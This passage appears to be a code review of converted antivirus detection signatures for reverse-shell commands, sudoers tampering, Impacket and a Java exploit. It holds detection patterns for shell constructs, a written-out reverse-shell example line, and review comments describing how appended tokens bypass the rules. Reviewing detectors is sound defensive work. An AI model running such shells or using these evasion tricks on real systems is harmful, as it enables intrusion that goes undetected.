$a_00_7 = {4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 5c 00 4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 53 00 68 00 61 00 72 00 69 00 6e 00 67 00 20 00 43 00 65 00 6e 00 74 00 65 00 72 00 } //65526 Network and Internet\Network and Sharing Center
$a_00_8 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //65526 inetcpl.cpl
$a_00_9 = {74 00 69 00 6d 00 65 00 64 00 61 00 74 00 65 00 2e 00 63 00 70 00 6c 00 } //65526 timedate.cpl
$a_00_10 = {69 00 6e 00 74 00 6c 00 2e 00 63 00 70 00 6c 00 } //65526 intl.cpl
$a_00_11 = {6d 00 6d 00 73 00 79 00 73 00 2e 00 63 00 70 00 6c 00 } //65526 mmsys.cpl
$a_00_12 = {4d 00 61 00 74 00 68 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 50 00 61 00 6e 00 65 00 6c 00 2e 00 63 00 70 00 6c 00 } //65526 MathControlPanel.cpl
$a_00_13 = {61 00 70 00 70 00 77 00 69 00 7a 00 2e 00 63 00 70 00 6c 00 } //65526 appwiz.cpl
$a_00_14 = {69 00 6d 00 65 00 69 00 70 00 2e 00 63 00 70 00 6c 00 } //65526 imeip.cpl
$a_00_15 = {53 00 6f 00 75 00 6e 00 64 00 } //65526 Sound
$a_02_16 = {63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 90 02 06 70 00 61 00 6e 00 65 00 6c 00 90 00 } //65526
$a_00_1 = {69 00 6e 00 70 00 75 00 74 00 2e 00 64 00 6c 00 6c 00 } //-10 input.dll
$a_00_2 = {20 00 50 00 72 00 69 00 6e 00 74 00 65 00 72 00 73 00 } //-10 Printers
$a_00_3 = {20 00 53 00 59 00 53 00 54 00 45 00 4d 00 } //-10 SYSTEM
$a_00_4 = {2f 00 6e 00 61 00 6d 00 65 00 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 } //-10 /name Microsoft.
$a_00_5 = {5c 00 4b 00 65 00 79 00 70 00 61 00 64 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 } //-10 \KeypadControl.exe
$a_00_6 = {20 00 64 00 65 00 73 00 6b 00 2e 00 63 00 70 00 6c 00 } //-10 desk.cpl
$a_00_7 = {4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 49 00 6e 00 74 00 65 00 72 00 6e 00 65 00 74 00 5c 00 4e 00 65 00 74 00 77 00 6f 00 72 00 6b 00 20 00 61 00 6e 00 64 00 20 00 53 00 68 00 61 00 72 00 69 00 6e 00 67 00 20 00 43 00 65 00 6e 00 74 00 65 00 72 00 } //-10 Network and Internet\Network and Sharing Center
$a_00_8 = {69 00 6e 00 65 00 74 00 63 00 70 00 6c 00 2e 00 63 00 70 00 6c 00 } //-10 inetcpl.cpl
$a_00_9 = {74 00 69 00 6d 00 65 00 64 00 61 00 74 00 65 00 2e 00 63 00 70 00 6c 00 } //-10 timedate.cpl
$a_00_10 = {69 00 6e 00 74 00 6c 00 2e 00 63 00 70 00 6c 00 } //-10 intl.cpl
$a_00_11 = {6d 00 6d 00 73 00 79 00 73 00 2e 00 63 00 70 00 6c 00 } //-10 mmsys.cpl
$a_00_12 = {4d 00 61 00 74 00 68 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 50 00 61 00 6e 00 65 00 6c 00 2e 00 63 00 70 00 6c 00 } //-10 MathControlPanel.cpl
$a_00_13 = {61 00 70 00 70 00 77 00 69 00 7a 00 2e 00 63 00 70 00 6c 00 } //-10 appwiz.cpl
$a_00_14 = {69 00 6d 00 65 00 69 00 70 00 2e 00 63 00 70 00 6c 00 } //-10 imeip.cpl
$a_00_15 = {53 00 6f 00 75 00 6e 00 64 00 } //-10 Sound
$a_02_16 = {63 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 2e 00 65 00 78 00 65 00 90 02 06 70 00 61 00 6e 00 65 00 6c 00 90 00 } //-10
condition:
((#a_00_0 & 1)*2+(#a_00_1 & 1)*65526+(#a_00_2 & 1)*65526+(#a_00_3 & 1)*65526+(#a_00_4 & 1)*65526+(#a_00_5 & 1)*65526+(#a_00_6 & 1)*65526+(#a_00_7 & 1)*65526+(#a_00_8 & 1)*65526+(#a_00_9 & 1)*65526+(#a_00_10 & 1)*65526+(#a_00_11 & 1)*65526+(#a_00_12 & 1)*65526+(#a_00_13 & 1)*65526+(#a_00_14 & 1)*65526+(#a_00_15 & 1)*65526+(#a_02_16 & 1)*65526) >=2
((#a_00_0 & 1)*2+(#a_00_1 & 1)*-10+(#a_00_2 & 1)*-10+(#a_00_3 & 1)*-10+(#a_00_4 & 1)*-10+(#a_00_5 & 1)*-10+(#a_00_6 & 1)*-10+(#a_00_7 & 1)*-10+(#a_00_8 & 1)*-10+(#a_00_9 & 1)*-10+(#a_00_10 & 1)*-10+(#a_00_11 & 1)*-10+(#a_00_12 & 1)*-10+(#a_00_13 & 1)*-10+(#a_00_14 & 1)*-10+(#a_00_15 & 1)*-10+(#a_02_16 & 1)*-10) >=2
}
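Review bot: The rule now reduces to the wide string `\control.exe` (weight 2, exactly the threshold) and none of sixteen -10 terms, and `$a_00_15` is the bare wide string `Sound`, so any command line that also carries that substring - a document path under a folder named Sound, for instance - is excluded even though it matches the exploit pattern. The other exclusions name concrete applets (`desk.cpl`, `inetcpl.cpl`, `mmsys.cpl`, ...) or use a leading space (` Printers`, ` SYSTEM`), and `Sound` would be less brittle in the same form, presumably ` Sound` if it is meant to cover the Control Panel page name. A comment on `$a_00_15` saying which legitimate invocation it is there for would settle that.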


@ -15,9 +15,9 @@ rule Exploit_WinNT_CVE-2012-0507_D_ldr{
$a_01_8 = {2a b6 05 6c bc 4c 03 3d } //10
$a_03_9 = {19 b7 3a 2a 12 90 01 01 03 90 01 01 be 19 b6 3a 90 00 } //10
$a_01_10 = {6a 61 76 61 2f 6c 61 6e 67 2f 43 6c 61 73 73 4c 6f 61 64 65 72 } //4 java/lang/ClassLoader
$a_01_11 = {2f 73 65 63 75 72 69 74 79 2f 70 72 6f 76 69 64 65 72 2f 50 6f 6c 69 63 79 } //65506 /security/provider/Policy
$a_01_12 = {4a 45 54 50 6f 6c 69 63 79 5d 20 4a 45 54 50 6f 6c 69 63 79 20 3a 20 65 78 74 20 64 69 72 20 3a } //65506 JETPolicy] JETPolicy : ext dir :
$a_01_11 = {2f 73 65 63 75 72 69 74 79 2f 70 72 6f 76 69 64 65 72 2f 50 6f 6c 69 63 79 } //-30 /security/provider/Policy
$a_01_12 = {4a 45 54 50 6f 6c 69 63 79 5d 20 4a 45 54 50 6f 6c 69 63 79 20 3a 20 65 78 74 20 64 69 72 20 3a } //-30 JETPolicy] JETPolicy : ext dir :
condition:
((#a_01_0 & 1)*5+(#a_01_1 & 1)*5+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_03_4 & 1)*4+(#a_03_5 & 1)*4+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*10+(#a_03_9 & 1)*10+(#a_01_10 & 1)*4+(#a_01_11 & 1)*65506+(#a_01_12 & 1)*65506) >=34
((#a_01_0 & 1)*5+(#a_01_1 & 1)*5+(#a_01_2 & 1)*5+(#a_01_3 & 1)*5+(#a_03_4 & 1)*4+(#a_03_5 & 1)*4+(#a_01_6 & 1)*1+(#a_01_7 & 1)*1+(#a_01_8 & 1)*10+(#a_03_9 & 1)*10+(#a_01_10 & 1)*4+(#a_01_11 & 1)*-30+(#a_01_12 & 1)*-30) >=34
}


@ -12,8 +12,8 @@ rule HackTool_Linux_Impacket_C{
$a_00_5 = {70 00 73 00 65 00 78 00 65 00 63 00 2e 00 70 00 79 00 20 00 } //5 psexec.py
$a_00_6 = {73 00 6d 00 62 00 63 00 6c 00 69 00 65 00 6e 00 74 00 2e 00 70 00 79 00 20 00 } //5 smbclient.py
$a_00_7 = {72 00 70 00 63 00 64 00 75 00 6d 00 70 00 2e 00 70 00 79 00 20 00 } //5 rpcdump.py
$a_00_8 = {79 00 75 00 6d 00 20 00 } //65436 yum
$a_00_8 = {79 00 75 00 6d 00 20 00 } //-100 yum
condition:
((#a_00_0 & 1)*50+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_00_8 & 1)*65436) >=55
((#a_00_0 & 1)*50+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_00_4 & 1)*5+(#a_00_5 & 1)*5+(#a_00_6 & 1)*5+(#a_00_7 & 1)*5+(#a_00_8 & 1)*-100) >=55
}
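Review bot: The `yum ` term at -100 outweighs the whole positive side (50 plus 5 per script name, threshold 55), so appending `yum ` anywhere to the command line - `psexec.py ... ; yum ` - silences the rule, and the trailing space does not tie the token to an actual package-manager invocation. If the scanned buffer is the raw command line, a positional test is harder to borrow than a weighted term, e.g. `... >=55 and not ($a_00_8 at 0)`; if it is not, the trade-off (one script name versus an attacker-addable -100) at least deserves a comment on `$a_00_8`. `$a_00_0` and its 50-weight string are outside the hunk, so I cannot see what the 50 is anchored on.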


@ -4,12 +4,12 @@ rule HackTool_Linux_PthToolkitGen_F{
description = "HackTool:Linux/PthToolkitGen.F,SIGNATURE_TYPE_CMDHSTR_EXT,06 00 06 00 05 00 00 "
strings :
$a_00_0 = {70 00 79 00 74 00 68 00 6f 00 6e 00 } //65436 python
$a_00_1 = {70 00 65 00 72 00 6c 00 } //65436 perl
$a_00_0 = {70 00 79 00 74 00 68 00 6f 00 6e 00 } //-100 python
$a_00_1 = {70 00 65 00 72 00 6c 00 } //-100 perl
$a_02_2 = {2d 00 75 00 20 00 90 02 80 25 00 90 01 40 3a 00 90 01 40 20 00 90 00 } //1
$a_02_3 = {2d 00 2d 00 75 00 73 00 65 00 72 00 3d 00 90 02 80 25 00 90 01 40 3a 00 90 01 40 20 00 90 00 } //1
$a_00_4 = {2f 00 2f 00 } //5 //
condition:
((#a_00_0 & 1)*65436+(#a_00_1 & 1)*65436+(#a_02_2 & 1)*1+(#a_02_3 & 1)*1+(#a_00_4 & 1)*5) >=6
((#a_00_0 & 1)*-100+(#a_00_1 & 1)*-100+(#a_02_2 & 1)*1+(#a_02_3 & 1)*1+(#a_00_4 & 1)*5) >=6
}


@ -8,9 +8,9 @@ rule HackTool_Linux_SudoNoPassAttempt_A{
$a_03_1 = {41 00 4c 00 4c 00 90 02 10 3d 00 90 00 } //1
$a_03_2 = {4e 00 4f 00 50 00 41 00 53 00 53 00 57 00 44 00 3a 00 90 02 10 41 00 4c 00 4c 00 90 00 } //1
$a_00_3 = {2f 00 65 00 74 00 63 00 2f 00 73 00 75 00 64 00 6f 00 65 00 72 00 73 00 } //1 /etc/sudoers
$a_00_4 = {61 00 7a 00 75 00 72 00 65 00 5f 00 70 00 69 00 70 00 65 00 6c 00 69 00 6e 00 65 00 73 00 5f 00 73 00 75 00 64 00 6f 00 } //65526 azure_pipelines_sudo
$a_00_5 = {77 00 69 00 6e 00 62 00 69 00 6e 00 64 00 } //65526 winbind
$a_00_4 = {61 00 7a 00 75 00 72 00 65 00 5f 00 70 00 69 00 70 00 65 00 6c 00 69 00 6e 00 65 00 73 00 5f 00 73 00 75 00 64 00 6f 00 } //-10 azure_pipelines_sudo
$a_00_5 = {77 00 69 00 6e 00 62 00 69 00 6e 00 64 00 } //-10 winbind
condition:
((#a_00_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65526+(#a_00_5 & 1)*65526) >=4
((#a_00_0 & 1)*1+(#a_03_1 & 1)*1+(#a_03_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-10+(#a_00_5 & 1)*-10) >=4
}
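Review bot: All four positive terms are required (4 x 1 against a threshold of 4) and either exclusion alone drops the score to -6, so a sudoers edit with ` # winbind` or `azure_pipelines_sudo` appended to the same command line is missed entirely; both tokens sit in attacker-controlled text. The exclusions presumably cover provisioning scripts that legitimately write `NOPASSWD: ALL`, and that trade-off should be spelled out next to them, e.g. `// FP dampers for pipeline/samba provisioning; attacker-addable, not a security boundary`. `$a_00_0` is outside the hunk.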


@ -7,10 +7,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_A{
$a_00_0 = {77 00 68 00 69 00 6c 00 65 00 } //1 while
$a_00_1 = {65 00 78 00 70 00 6f 00 72 00 74 00 } //1 export
$a_02_2 = {65 00 76 00 61 00 6c 00 20 00 24 00 28 00 77 00 68 00 6f 00 69 00 73 00 20 00 2d 00 68 00 20 00 90 02 20 20 00 2d 00 70 00 90 00 } //10
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_00_3 & 1)*65486+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486) >=12
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_00_3 & 1)*-50+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50) >=12
}


@ -7,10 +7,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_C{
$a_02_0 = {61 00 77 00 6b 00 20 00 42 00 45 00 47 00 49 00 4e 00 90 02 02 7b 00 90 00 } //10
$a_00_1 = {2f 00 69 00 6e 00 65 00 74 00 2f 00 74 00 63 00 70 00 2f 00 30 00 2f 00 } //5 /inet/tcp/0/
$a_00_2 = {2f 00 69 00 6e 00 65 00 74 00 2f 00 75 00 64 00 70 00 2f 00 30 00 2f 00 } //5 /inet/udp/0/
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_3 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_4 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_5 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_02_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*65486+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486) >=15
((#a_02_0 & 1)*10+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*-50+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50) >=15
}


@ -10,10 +10,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_D{
$a_00_3 = {73 00 6f 00 63 00 6b 00 5f 00 73 00 74 00 72 00 65 00 61 00 6d 00 } //1 sock_stream
$a_02_4 = {63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 90 02 01 28 00 90 02 01 28 00 90 02 50 29 00 90 00 } //1
$a_00_5 = {6f 00 73 00 2e 00 64 00 75 00 70 00 32 00 } //1 os.dup2
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65456 localhost
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-80 localhost
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
condition:
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65456+(#a_00_7 & 1)*65456+(#a_00_8 & 1)*65456) >=24
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-80+(#a_00_7 & 1)*-80+(#a_00_8 & 1)*-80) >=24
}
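Review bot: `$a_00_3` is the lowercase wide string `sock_stream`, but the Python one-liner the other terms describe (`connect((...))`, `os.dup2`) writes `socket.SOCK_STREAM`, and YARA hex strings are always case-sensitive; since the threshold (24) requires every term, the converted rule cannot fire on the canonical payload unless the source engine matched case-insensitively and the conversion dropped that. If so, the wide strings want to be text strings with modifiers rather than hex, e.g. `$a_00_3 = "sock_stream" wide nocase`. The rule's first three strings are outside the hunk, so I cannot tell whether `$a_00_2` has the same problem.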


@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_E{
$a_02_5 = {73 00 6f 00 63 00 6b 00 61 00 64 00 64 00 72 00 5f 00 69 00 6e 00 90 02 02 28 00 90 02 50 2c 00 90 00 } //1
$a_00_6 = {69 00 6e 00 65 00 74 00 5f 00 61 00 74 00 6f 00 6e 00 } //1 inet_aton
$a_00_7 = {6f 00 70 00 65 00 6e 00 } //1 open
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65456 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-80 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
condition:
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_02_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65456+(#a_00_9 & 1)*65456+(#a_00_10 & 1)*65456) >=26
((#a_02_0 & 1)*10+(#a_02_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_02_4 & 1)*1+(#a_02_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-80+(#a_00_9 & 1)*-80+(#a_00_10 & 1)*-80) >=26
}


@ -8,10 +8,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_F{
$a_00_1 = {3e 00 26 00 20 00 2f 00 64 00 65 00 76 00 2f 00 75 00 64 00 70 00 2f 00 } //10 >& /dev/udp/
$a_00_2 = {73 00 68 00 20 00 2d 00 69 00 } //1 sh -i
$a_00_3 = {30 00 3e 00 26 00 31 00 } //1 0>&1
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_4 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_5 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_6 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*65486+(#a_00_5 & 1)*65486+(#a_00_6 & 1)*65486) >=12
((#a_00_0 & 1)*10+(#a_00_1 & 1)*10+(#a_00_2 & 1)*1+(#a_00_3 & 1)*1+(#a_00_4 & 1)*-50+(#a_00_5 & 1)*-50+(#a_00_6 & 1)*-50) >=12
}
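Review bot: The three -50 terms are bare `127.0.0.1`/`localhost`/`0.0.0.0` substrings, so `bash -i >& /dev/tcp/203.0.113.5/4444 0>&1 # localhost` scores 12 - 50 and is missed, while the intent is presumably only to ignore shells pointed at the local host. Anchoring the exclusion to the address position of the pattern the rule is built on keeps that intent without handing out a free bypass, e.g. `$a_00_4 = "/dev/tcp/127.0.0.1/" wide` (plus the udp twin) instead of the bare address. The same shape recurs in the sibling SuspUnixReShellCmd and SuspNetcatCmd rules in this commit.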


@ -10,10 +10,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_G{
$a_02_3 = {73 00 6f 00 63 00 6b 00 61 00 64 00 64 00 72 00 5f 00 69 00 6e 00 90 02 02 28 00 90 02 50 2c 00 90 00 } //10
$a_00_4 = {69 00 6e 00 65 00 74 00 5f 00 61 00 74 00 6f 00 6e 00 } //1 inet_aton
$a_00_5 = {6f 00 70 00 65 00 6e 00 } //1 open
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65456 127.0.0.1
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65456 0.0.0.0
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-80 127.0.0.1
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-80 0.0.0.0
condition:
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65456+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65456) >=24
((#a_00_0 & 1)*1+(#a_00_1 & 1)*1+(#a_02_2 & 1)*10+(#a_02_3 & 1)*10+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-80+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-80) >=24
}
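Review bot: `localhost` keeps -50 while `127.0.0.1` and `0.0.0.0` get -80 (old values 65486 versus 65456), so the conversion is faithful but the asymmetry is unexplained; the siblings _D, _E and _N weight all three at -80. In practice it changes nothing here, because the threshold (24) needs every positive term and either value zeroes the rule, but if the source signature really carries 0xFFCE for `localhost` a one-line comment saying so would stop the next reader from "fixing" it. The rule's first two strings are outside the hunk.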


@ -10,10 +10,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_I{
$a_00_3 = {65 00 78 00 65 00 63 00 } //1 exec
$a_00_4 = {3c 00 26 00 } //1 <&
$a_00_5 = {3e 00 26 00 } //1 >&
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_6 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_7 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_8 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_02_0 & 1)*2+(#a_02_1 & 1)*2+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*65486+(#a_00_7 & 1)*65486+(#a_00_8 & 1)*65486) >=15
((#a_02_0 & 1)*2+(#a_02_1 & 1)*2+(#a_00_2 & 1)*10+(#a_00_3 & 1)*1+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*-50+(#a_00_7 & 1)*-50+(#a_00_8 & 1)*-50) >=15
}


@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_J{
$a_00_5 = {2d 00 72 00 73 00 6f 00 63 00 6b 00 65 00 74 00 } //1 -rsocket
$a_00_6 = {2d 00 65 00 } //1 -e
$a_00_7 = {2d 00 72 00 6f 00 70 00 65 00 6e 00 73 00 73 00 6c 00 } //1 -ropenssl
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-50 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-50 0.0.0.0
condition:
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_02_2 & 1)*5+(#a_02_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65486+(#a_00_9 & 1)*65486+(#a_00_10 & 1)*65486) >=23
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_02_2 & 1)*5+(#a_02_3 & 1)*5+(#a_00_4 & 1)*1+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-50+(#a_00_9 & 1)*-50+(#a_00_10 & 1)*-50) >=23
}


@ -12,10 +12,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_K{
$a_00_5 = {73 00 65 00 6e 00 64 00 } //1 send
$a_00_6 = {63 00 6c 00 6f 00 73 00 65 00 } //1 close
$a_00_7 = {2d 00 65 00 } //1 -e
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65476 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65476 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65476 0.0.0.0
$a_00_8 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-60 127.0.0.1
$a_00_9 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //-60 localhost
$a_00_10 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //-60 0.0.0.0
condition:
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_02_4 & 1)*5+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*65476+(#a_00_9 & 1)*65476+(#a_00_10 & 1)*65476) >=28
((#a_00_0 & 1)*5+(#a_00_1 & 1)*5+(#a_00_2 & 1)*5+(#a_00_3 & 1)*5+(#a_02_4 & 1)*5+(#a_00_5 & 1)*1+(#a_00_6 & 1)*1+(#a_00_7 & 1)*1+(#a_00_8 & 1)*-60+(#a_00_9 & 1)*-60+(#a_00_10 & 1)*-60) >=28
}


@ -11,10 +11,10 @@ rule HackTool_Linux_SuspUnixReShellCmd_L{
$a_00_4 = {64 00 6f 00 20 00 73 00 68 00 20 00 26 00 26 00 20 00 62 00 72 00 65 00 61 00 6b 00 3b 00 } //1 do sh && break;
$a_00_5 = {64 00 6f 00 6e 00 65 00 20 00 32 00 3e 00 26 00 31 00 } //1 done 2>&1
$a_00_6 = {73 00 68 00 20 00 2d 00 63 00 } //1 sh -c
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //65486 127.0.0.1
$a_00_8 = {6c 00 6f 00 63 00 61 00 6c 00 68 00 6f 00 73 00 74 00 } //65486 localhost
$a_00_9 = {30 00 2e 00 30 00 2e 00 30 00 2e 00 30 00 } //65486 0.0.0.0
$a_00_7 = {31 00 32 00 37 00 2e 00 30 00 2e 00 30 00 2e 00 31 00 } //-50 127.0.0.1
